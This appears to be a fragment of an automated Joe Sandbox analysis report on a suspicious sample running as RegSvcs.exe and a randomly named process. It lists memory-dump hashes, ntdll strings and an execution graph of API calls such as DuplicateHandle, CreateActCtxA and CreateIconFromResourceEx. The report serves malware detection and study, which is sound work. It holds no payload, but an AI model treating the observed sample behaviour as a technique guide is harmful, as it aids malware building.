                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 47d19593e3bc67ab661ff09d50629ce8afebeb6cba7d826b6da7c34762d2974c
                                                                                                              • Instruction ID: 4faadddc6727fd6f5711aaee08636664f3d859198d176a1d4deb48ea4b159a63
                                                                                                              • Opcode Fuzzy Hash: 47d19593e3bc67ab661ff09d50629ce8afebeb6cba7d826b6da7c34762d2974c
                                                                                                              • Instruction Fuzzy Hash: 2890022164545102D154725C44086164085B7E0211F59C421A0814994DC59589556321
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a7a943c25c87eeaa4e6abce30d379b29ecd79bcd9010e78749df2cb818aefbe5
                                                                                                              • Instruction ID: d1d5a9c644c7c2bef3a9778a3c46285d44ac53089c12027f0bba5b6335d82613
                                                                                                              • Opcode Fuzzy Hash: a7a943c25c87eeaa4e6abce30d379b29ecd79bcd9010e78749df2cb818aefbe5
                                                                                                              • Instruction Fuzzy Hash: 2090023560140402D5147258580864600C6A7D0311F59D811A0424958DC69489A1A221
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2ab8c271c863c3ffcff9e517406ffd049b7de69e8017a841861c27f431a17be0
                                                                                                              • Instruction ID: a9ce98f62f8b3cde2e656b803d8bf9b73bf5b96bd5a3f52db84c6eb0ea341389
                                                                                                              • Opcode Fuzzy Hash: 2ab8c271c863c3ffcff9e517406ffd049b7de69e8017a841861c27f431a17be0
                                                                                                              • Instruction Fuzzy Hash: 0B90023160240142954473585808A4E4185A7E1312B99D815A0015954CC95489615321
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction ID: c8a7568f676a18a8ae77a3c6076824ac5f56f67c71ba10dbc3ede338dba9dce1
                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 2c34eeb85fa7ab9545ba12a6ee022fead3561d39bcf34be95f473f3146655c99
                                                                                                              • Instruction ID: df23dc21eeb217cef10665139a51cf27273a1e9efddfd195031fa44906b3d727
                                                                                                              • Opcode Fuzzy Hash: 2c34eeb85fa7ab9545ba12a6ee022fead3561d39bcf34be95f473f3146655c99
                                                                                                              • Instruction Fuzzy Hash: EC51E8B1A04216BFCB25DB9CCC9097EFBF8BB48241B548169F495DB681D374DE4087E0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: ec157f387e55dd412c2b2492e034a8d7be05f2cdb5dceab7d9a99d61591218af
                                                                                                              • Instruction ID: d8db2cc935c04da8549c0d4b0bacd9880ed0dd0ebb3c32833c86eeddd5fda8ee
                                                                                                              • Opcode Fuzzy Hash: ec157f387e55dd412c2b2492e034a8d7be05f2cdb5dceab7d9a99d61591218af
                                                                                                              • Instruction Fuzzy Hash: 9651F475A00646AFCB24DF9CDCA097EBBF9EF44200B24845EF496D7681E7B4DA4087A0
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016046FC
                                                                                                              • Execute=1, xrefs: 01604713
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01604742
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01604725
                                                                                                              • ExecuteOptions, xrefs: 016046A0
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01604787
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01604655
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: e8a01bf11c799548d944be44f634e2dacafefcfe065c37610b6b6ee9e4c05f5a
                                                                                                              • Instruction ID: 785c176b1b668f34f1b48950a1252c830c4a8a00b4b28a004afc10c9a6e35368
                                                                                                              • Opcode Fuzzy Hash: e8a01bf11c799548d944be44f634e2dacafefcfe065c37610b6b6ee9e4c05f5a
                                                                                                              • Instruction Fuzzy Hash: 9651093160021A7EEF21AFE9EC86BAE77A8FF58700F04009DD605AF591DB709A458F54
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                              • Instruction ID: 62a2f5bd9e791d3f37f57bc74a4f71877441a272246b05dbf944d6a515bebe55
                                                                                                              • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                              • Instruction Fuzzy Hash: 9E021371508342AFD315CF19D890A6BBBE9FFC8704F448A6DF9898B264DB31E945CB42
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction ID: f176d336896507b81ae247c519764fd48b9e536a4949eb655f99d2d663688700
                                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction Fuzzy Hash: 4381AD70E0524A9FEF35CE6CC8917BEBBA3BF46360F1A4659D861AF291C6349840CB51
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                              • API String ID: 48624451-2819853543
                                                                                                              • Opcode ID: 0c4d80920fc8e84668a33cd49b23d2b2398be0338a8c55c993f24f2627ffbc18
                                                                                                              • Instruction ID: ba6e191a6adb3e40efcdd6cb78189a020b2d58862274464fa9570a7dbbb95b2d
                                                                                                              • Opcode Fuzzy Hash: 0c4d80920fc8e84668a33cd49b23d2b2398be0338a8c55c993f24f2627ffbc18
                                                                                                              • Instruction Fuzzy Hash: 2021537AA0011AABDB20DF69DC54AEEBBF8AF54641F54011AFA45E7240E730DA11CBA1
                                                                                                              Strings
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016002BD
                                                                                                              • RTL: Re-Waiting, xrefs: 0160031E
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016002E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: e3a8cb5aba3fdb5cdbe9f181d5262b508eb4c63e1f7b27cb8901afda76a70c54
                                                                                                              • Instruction ID: e71c86800a6dc1d2f3a84f317c27e0af50aec4dd5123f9951130d8db1a310815
                                                                                                              • Opcode Fuzzy Hash: e3a8cb5aba3fdb5cdbe9f181d5262b508eb4c63e1f7b27cb8901afda76a70c54
                                                                                                              • Instruction Fuzzy Hash: 02E19C306047429FD72ACF2CCC84B6ABBE0BB88754F144A6EF5A58B2E1D774D945CB42
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 01607BAC
                                                                                                              • RTL: Resource at %p, xrefs: 01607B8E
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01607B7F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: 269d3590e9dad9dd7094504a2923601b0865f35877f8fb2af09ea4b6117a0754
                                                                                                              • Instruction ID: daba75950b8e8159b8e9784b2cc5b19c78c1d7965538d5fa5f53cc92bbbe1139
                                                                                                              • Opcode Fuzzy Hash: 269d3590e9dad9dd7094504a2923601b0865f35877f8fb2af09ea4b6117a0754
                                                                                                              • Instruction Fuzzy Hash: D941D0317007039FD725DE69CC41B6BB7E5FB98B10F000A1DE9AA9B780DB71E8058B91
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0160728C
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 016072C1
                                                                                                              • RTL: Resource at %p, xrefs: 016072A3
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01607294
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: a036ee0f9178a331028e122098e7a53bb958175802096389ccf107d21cd83027
                                                                                                              • Instruction ID: cc1bf0877383e9aedd7ed62e53955c8c1088ce8ed99bbb17fec1d48dc4fa8b73
                                                                                                              • Opcode Fuzzy Hash: a036ee0f9178a331028e122098e7a53bb958175802096389ccf107d21cd83027
                                                                                                              • Instruction Fuzzy Hash: 34411231604206AFC725CE69CC82F6AB7A6FF94B10F14461CF9959B280DB31F8128BD1
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: fef0f8433d28696708cc1860b8757b9e73884b7814e6151eaba94fadf4a304a1
                                                                                                              • Instruction ID: 7aff1f3a2368420c9fd9a85c4d5df41e00ea5e703a450f397541e2745708c1c3
                                                                                                              • Opcode Fuzzy Hash: fef0f8433d28696708cc1860b8757b9e73884b7814e6151eaba94fadf4a304a1
                                                                                                              • Instruction Fuzzy Hash: E2318072A006199FDB21DF2DDC50BEEB7F8FB44610F54059AF949E7240EB30AA548FA0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction ID: bd109ff267c79021aff9273fbea2723ddd8661a325ea45c090fcd2d617567fbd
                                                                                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction Fuzzy Hash: D791A171E002179EEB34DF6DC8816BEBBA1FF88328F54455AE965EF2C0E73099418751
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.2069759006.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_1560000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              • Opcode ID: 1f7684f49a43a158d48254c8e437b3b19d1e317aa383caf2ecfeb6302d950003
                                                                                                              • Instruction ID: ef814f6d351ff82fd828096481570fb976f1265b752c47719c6ffab4973dd735
                                                                                                              • Opcode Fuzzy Hash: 1f7684f49a43a158d48254c8e437b3b19d1e317aa383caf2ecfeb6302d950003
                                                                                                              • Instruction Fuzzy Hash: CE810CB1D0026A9BDB35CB54CC44BEEB7B4BF48714F0041DAAA19BB680D7309E84CFA1

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:11.5%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:118
                                                                                                              Total number of Limit Nodes:11
                                                                                                              execution_graph 26462 4cc9548 26466 4cc9580 26462->26466 26470 4cc9570 26462->26470 26463 4cc9567 26467 4cc9589 26466->26467 26474 4cc95b8 26467->26474 26468 4cc95ae 26468->26463 26471 4cc9580 26470->26471 26473 4cc95b8 DrawTextExW 26471->26473 26472 4cc95ae 26472->26463 26473->26472 26475 4cc9603 26474->26475 26476 4cc95f2 26474->26476 26477 4cc9691 26475->26477 26480 4cc9cf0 26475->26480 26485 4cc9ce2 26475->26485 26476->26468 26477->26468 26481 4cc9d18 26480->26481 26482 4cc9e1e 26481->26482 26490 4cca400 26481->26490 26495 4cca410 26481->26495 26482->26476 26486 4cc9cf0 26485->26486 26487 4cc9e1e 26486->26487 26488 4cca400 DrawTextExW 26486->26488 26489 4cca410 DrawTextExW 26486->26489 26487->26476 26488->26487 26489->26487 26491 4cca410 26490->26491 26500 4cca868 26491->26500 26506 4cca878 26491->26506 26492 4cca49c 26492->26482 26496 4cca426 26495->26496 26498 4cca868 DrawTextExW 26496->26498 26499 4cca878 DrawTextExW 26496->26499 26497 4cca49c 26497->26482 26498->26497 26499->26497 26502 4cca86b 26500->26502 26501 4cca839 26501->26492 26502->26501 26510 4cca8b8 26502->26510 26515 4cca8aa 26502->26515 26503 4cca896 26503->26492 26508 4cca8b8 DrawTextExW 26506->26508 26509 4cca8aa DrawTextExW 26506->26509 26507 4cca896 26507->26492 26508->26507 26509->26507 26511 4cca8e9 26510->26511 26512 4cca916 26511->26512 26520 4cca928 26511->26520 26525 4cca938 26511->26525 26512->26503 26516 4cca8b8 26515->26516 26517 4cca916 26516->26517 26518 4cca928 DrawTextExW 26516->26518 26519 4cca938 DrawTextExW 26516->26519 26517->26503 26518->26517 26519->26517 26522 4cca92b 26520->26522 26521 4cca96e 26521->26512 26522->26521 26530 4cc9b6c 26522->26530 26524 4cca9d9 26527 4cca959 26525->26527 26526 4cca96e 26526->26512 26527->26526 26528 4cc9b6c DrawTextExW 26527->26528 26529 4cca9d9 26528->26529 26532 4cc9b77 26530->26532 26531 4ccc9a1 26531->26524 26532->26531 26536 4ccd520 26532->26536 26539 4ccd512 26532->26539 26533 4cccab4 26533->26524 26543 4ccc6e4 26536->26543 26540 4ccd520 26539->26540 26541 4ccc6e4 DrawTextExW 26540->26541 26542 4ccd53d 26541->26542 26542->26533 26544 4ccd558 DrawTextExW 26543->26544 26546 4ccd53d 26544->26546 26546->26533 26568 4cce8b8 26569 4cce8f2 26568->26569 26570 4cce96e 26569->26570 26571 4cce983 26569->26571 26576 4ccc7e4 26570->26576 26573 4ccc7e4 3 API calls 26571->26573 26574 4cce992 26573->26574 26577 4ccc7ef 26576->26577 26578 4cce979 26577->26578 26581 4ccf2d8 26577->26581 26587 4ccf2d2 26577->26587 26594 4ccc82c 26581->26594 26584 4ccf2ff 26584->26578 26585 4ccf317 CreateIconFromResourceEx 26586 4ccf3a6 26585->26586 26586->26578 26588 4ccf2d8 26587->26588 26589 4ccc82c CreateIconFromResourceEx 26588->26589 26590 4ccf2f2 26589->26590 26591 4ccf2ff 26590->26591 26592 4ccf317 CreateIconFromResourceEx 26590->26592 26591->26578 26593 4ccf3a6 26592->26593 26593->26578 26595 4ccf328 CreateIconFromResourceEx 26594->26595 26596 4ccf2f2 26595->26596 26596->26584 26596->26585 26547 26e4668 26548 26e467a 26547->26548 26549 26e4686 26548->26549 26551 26e4778 26548->26551 26552 26e479d 26551->26552 26556 26e4888 26552->26556 26560 26e4879 26552->26560 26557 26e48af 26556->26557 26559 26e498c 26557->26559 26564 26e44e0 26557->26564 26562 26e48af 26560->26562 26561 26e498c 26561->26561 26562->26561 26563 26e44e0 CreateActCtxA 26562->26563 26563->26561 26565 26e5918 CreateActCtxA 26564->26565 26567 26e59db 26565->26567 26597 26eb0d8 26598 26eb11a 26597->26598 26599 26eb120 GetModuleHandleW 26597->26599 26598->26599 26600 26eb14d 26599->26600 26601 26ed578 26602 26ed5be 26601->26602 26606 26ed748 26602->26606 26609 26ed758 26602->26609 26603 26ed6ab 26612 26eb8d0 26606->26612 26610 26eb8d0 DuplicateHandle 26609->26610 26611 26ed786 26609->26611 26610->26611 26611->26603 26613 26ed7c0 DuplicateHandle 26612->26613 26614 26ed786 26613->26614 26614->26603

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 294 26eb93b-26eb93d 295 26eb93f-26eb947 294->295 296 26eb8ca 294->296 297 26eb94d-26eb95a 295->297 298 26eb9d8-26eb9de 295->298 299 26eb8cc-26eb8d7 296->299 300 26eb8b5-26eb8be 296->300 301 26eb9cc-26eb9d5 297->301 302 26eb95c-26eb969 297->302 303 26ed7c0-26ed854 DuplicateHandle 298->303 299->303 300->296 302->301 304 26eb96b 302->304 305 26ed85d-26ed87a 303->305 306 26ed856-26ed85c 303->306 308 26eb989-26eb992 304->308 309 26eb9b7-26eb9c0 304->309 310 26eb972-26eb97b 304->310 311 26eb9a0-26eb9a9 304->311 306->305 308->298 314 26eb994-26eb99e 308->314 309->298 316 26eb9c2-26eb9c9 309->316 310->298 313 26eb97d-26eb987 310->313 311->298 315 26eb9ab-26eb9b5 311->315 313->301 314->301 315->301 316->301
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,026ED786,?,?,?,?,?), ref: 026ED847
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1994568043.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_26e0000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                              • API String ID: 3793708945-1484464239
                                                                                                              • Opcode ID: 5f030d13983fc62087d72d3f12b205232e1b0dcd0902dd18a76dd7a3098d8bb9
                                                                                                              • Instruction ID: eb0be5284f4ca507f20ccfcc51adbc2e26dc4a2c7d9cb2937b566083c43df035
                                                                                                              • Opcode Fuzzy Hash: 5f030d13983fc62087d72d3f12b205232e1b0dcd0902dd18a76dd7a3098d8bb9
                                                                                                              • Instruction Fuzzy Hash: 3E518875900209CFCB10CF89D580AAEBBF5FF89314F1A895AE416AB252D334F955CF94

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 729 26e44e0-26e59d9 CreateActCtxA 732 26e59db-26e59e1 729->732 733 26e59e2-26e5a3c 729->733 732->733 740 26e5a3e-26e5a41 733->740 741 26e5a4b-26e5a4f 733->741 740->741 742 26e5a60 741->742 743 26e5a51-26e5a5d 741->743 745 26e5a61 742->745 743->742 745->745
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 026E59C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1994568043.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_26e0000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: 2ba316406fe4208729569a944645adfd36ea2b98bd749771eaba2e57ea57c60f
                                                                                                              • Instruction ID: 4b1193bd3f266dd56c1b4588d232aedae21c0c301ee56ec4915e6877456f1553
                                                                                                              • Opcode Fuzzy Hash: 2ba316406fe4208729569a944645adfd36ea2b98bd749771eaba2e57ea57c60f
                                                                                                              • Instruction Fuzzy Hash: 3641F2B0D01719CBDB24CFA9C94478EBBF5BF48308F20806AD409AB255DB756949CF90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 746 26e590c-26e59d9 CreateActCtxA 748 26e59db-26e59e1 746->748 749 26e59e2-26e5a3c 746->749 748->749 756 26e5a3e-26e5a41 749->756 757 26e5a4b-26e5a4f 749->757 756->757 758 26e5a60 757->758 759 26e5a51-26e5a5d 757->759 761 26e5a61 758->761 759->758 761->761
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 026E59C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1994568043.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_26e0000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: 4b7f79918b375fd266abf82443c37cd6c773848518f2f9472134567e6f6077e3
                                                                                                              • Instruction ID: 72fe58115247b5a97462937b04e07fcc4d45de6b9b79235be88c5209f01b9429
                                                                                                              • Opcode Fuzzy Hash: 4b7f79918b375fd266abf82443c37cd6c773848518f2f9472134567e6f6077e3
                                                                                                              • Instruction Fuzzy Hash: A041E2B0C01719CBDB24CFA9C98478DBBB6BF49308F24806AD419AB255DB75694ACF90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 762 4ccf2d8-4ccf2fd call 4ccc82c 765 4ccf2ff-4ccf30f call 4cc75b0 762->765 766 4ccf312-4ccf3a4 CreateIconFromResourceEx 762->766 770 4ccf3ad-4ccf3ca 766->770 771 4ccf3a6-4ccf3ac 766->771 771->770
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2018732985.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_4cc0000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFromIconResource
                                                                                                              • String ID:
                                                                                                              • API String ID: 3668623891-0
                                                                                                              • Opcode ID: 08a667ffc1e0bb8ad58c9678b48bcccc8cd7250967dd8b88ca64a85ba5471d07
                                                                                                              • Instruction ID: 6035e0fe2984cbb5c8cf9f88d49de60738423374235ace4fee718696901dd075
                                                                                                              • Opcode Fuzzy Hash: 08a667ffc1e0bb8ad58c9678b48bcccc8cd7250967dd8b88ca64a85ba5471d07
                                                                                                              • Instruction Fuzzy Hash: 6C3198B2900359DFCB01CFA9D844AEEBFF5EF09310F18805AE554AB261C335A950DFA0

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 784 4ccd550-4ccd5a4 786 4ccd5af-4ccd5be 784->786 787 4ccd5a6-4ccd5ac 784->787 788 4ccd5c0 786->788 789 4ccd5c3-4ccd5fc DrawTextExW 786->789 787->786 788->789 790 4ccd5fe-4ccd604 789->790 791 4ccd605-4ccd622 789->791 790->791
                                                                                                              APIs
                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04CCD53D,?,?), ref: 04CCD5EF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.2018732985.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_4cc0000_STiokuWkiGFJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DrawText
                                                                                                              • String ID:
                                                                                                              • API String ID: 2175133113-0
                                                                                                              • Opcode ID: 09f895661848e89bbbdbbdfd160d25bfae27accea9a42557eeb00bbdaf82cd0d
                                                                                                              • Instruction ID: fdf96cae6218771ec7744d17b32751e309965a876a2ef3a8f1949d6a455cac5f
